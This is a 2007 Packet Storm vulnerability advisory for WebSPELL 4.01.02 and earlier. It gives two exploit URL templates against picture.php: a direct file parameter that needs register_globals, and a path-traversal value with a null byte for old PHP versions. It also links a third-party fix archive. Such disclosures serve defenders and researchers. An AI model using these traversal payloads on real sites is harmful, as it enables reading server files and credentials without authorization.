webspell-disclose.txt

2007-04-08T00:00:00
ID PACKETSTORM:55734
Type packetstorm
Reporter Trex
Modified 2007-04-08T00:00:00

Description

                                        
                                            `# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability  
# Discovered by: Trex  
# Visit: www.Trex-Online.net / www.UnderGround.ag  
# Comment: Happy easter!  
#  
# ___ ___  
# / \ / \ ___________________________  
# / / \_/ \ \ / \  
# \__/\ /\__/ / GIVE ME A CARROT OR I WILL \  
# \O O/ \ BLOW UP YOUR HOUSE /  
# ___/ ^ \___ / ___________________________/  
# \___/ /_/  
# _/ \_  
# __// \\__  
# /___\/_\/___\  
#  
#  
#  
# Vulnerability 1:  
# Advantage: works independently from PHP version.  
# Disadvantage: works dependently from PHP option register_globals (= on).  
#  
# http://[SITE][PAHT]/picture.php?file=[FILE]  
#  
#  
#  
# Vulnerability 2:  
# Advantage: works independently from PHP option register_globals.  
# Disadvantage: works dependently from PHP versions (< 4.3.0).  
#  
# http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00  
#  
#  
#  
# Solution:  
# http://fixes.trex-online.net/picture.rar  
  
`